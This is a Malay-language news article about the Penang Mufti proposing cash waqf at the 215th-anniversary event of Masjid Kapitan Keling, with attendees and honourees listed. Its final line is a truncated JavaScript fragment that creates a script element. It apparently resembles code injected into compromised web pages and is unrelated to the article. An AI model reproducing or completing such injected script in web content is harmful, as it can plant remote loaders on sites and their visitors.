Mufti syor laksana ‘Wakaf Tunai’ demi tambah tanah, hartanah umat Islam P. Pinang

GEORGE TOWN – Mufti Pulau Pinang, Sohibus Samahah Dato’ Dr. Wan Salim Wan Mohd. Noor mensyor pelaksanaan ibadah ‘wakaf tunai’ demi menambahkan jumlah tanah serta hartanah umat Islam di negeri ini.

Beliau berkata demikian semasa merasmikan Majlis Sambutan Ulang Tahun Ke-215 Masjid Kapitan Keling di sini baru-baru ini.

Exco Kerajaan Tempatan, Pengurusan Lalulintas dan Tebatan Banjir, Chow Kon Yeow yang juga Ahli Dewan Undangan Negeri (ADUN) Padang Kota serta ADUN Komtar, Teh Lai Heng turut sertai majlis sambutan tersebut di dalam dewan solat utama masjid berkaitan.

“Masjid Kapitan Keling yang didirikan pada tahun 1801 ini adalah simbol pengorbanan dermawan daripada kalangan India Muslim terdahulu untuk manfaat umat Islam sehingga hari ini.

“Tanpa pengorbanan seperti Cauder Mohuddeen (Merican) serta banyak lagi tokoh India Muslim yang mewakafkan harta dan aset mereka di jalan Allah, mungkin tiada Masjid Kapitan Keling dengan nilai warisan yang tidak ternilai di tengah-tengah bandar raya George Town, yang masih boleh kita lihat sehingga hari ini.

“Walaupun banyak tanah wakaf di Pulau Pinang, sebenarnya amat sukar dibangunkan kerana dokumentasi tak lengkap, ada lafaz pewakaf tanpa surat hitam putih serta ada beberapa tanah wakaf yang dituntut oleh waris, yang semua ini mesti diselesaikan secara pentadbiran dan perundangan.

“Untuk mendapatkan tanah seperti tanah Masjid Kapitan Keling mungkin amat sukar sekarang, maka saya mencadangkan ‘wakaf tunai’ kerana ia lebih praktikal dan realistik untuk dilaksanakan demi mengekalkan kepentingan serta menambah jumlah tanah serta hartanah umat Islam di negeri ini.

“(Wakaf tunai) ini masih peringkat cadangan dan selepas ini insya-Allah kita (Jabatan Mufti Pulau Pinang) akan melancarkan jelajah bagi memahamkan umat Islam mengenai betapa penting ibadah ‘wakaf tunai’ ini.

“Kita (Jabatan Mufti Pulau Pinang) akan tengok manamana tanah milik peribadi umat Islam terdahulu, kita akan cuba dapatkan balik dan itu bukan mustahil untuk dilaksanakan.

“Kaedahnya adalah kita (Jabatan Mufti Pulau Pinang) akan mengenal pasti mana-mana tanah atau aset umat Islam tertentu dengan nilai harga pasaran yang jelas serta terma-terma yang jelas, kita akan lancar wakaf tunai ini supaya tanah dan hartanah ini kekal bertambah manfaatnya kepada umat Islam secara umum,” ujarnya di depan hampir 300 pemimpin, penggerak pertubuhan dakwah serta tetamu-tetamu di sini baru-baru ini.

Pengerusi Jawatankuasa Kariah Masjid Kapitan Keling, Meera Mydin Mastan turut berucap pada majlis itu. Hadir sama, Pengasas Islamic Propagation Society International (IPSI) Malaysia Penang, Brother Kamaruddin Abdullah, Shamsul Hameed (Timbalan Pengerusi Liga Muslim Pulau Pinang), Datuk Mohamed Rabi Peer Mohd. (wakil Pertubuhan Al-Imam) serta beberapa wakil pertubuhan bukan kerajaan (NGO) lain.

Sebelum itu, Wan Salim bersama-sama Imam Kedua Masjid Kapitan Keling, Ustaz Abdul Latif Yusof memimpin Majlis Tadarus Al-Quran serta zikir, sebelum acara jamuan berbuka puasa.

Pada majlis sama, Mufti diiringi Meera Mydin turut menyampaikan sumbangan penghargaan kepada beberapa bekas Pengerusi Jawatankuasa Kariah Masjid Kapitan Keling atau waris tokoh berkenaan, yang dilihat gigih dalam memakmurkan Masjid Kapitan Keling sejak didirikan pada tahun 1801 Masihi.

Mereka, Imam Utama Masjid Kapitan Keling yang juga Ahli Hadith, Datuk Sheikh Abdullah Bukhari Alim, Ustaz Abdul Latif Yusof, waris Allahyarham Ustaz Sheikh Ahmad Baidram, waris Allahyarham Haji K.M. Mohamed Ariff Mohamed Sultan, Tuan Haji Kader Sultan S.K. Meera, Datuk Seri Haji Barkath Ali Abu Backer dan Mohamed Rabi.

var d=document;var s=d.createElement(‘script’);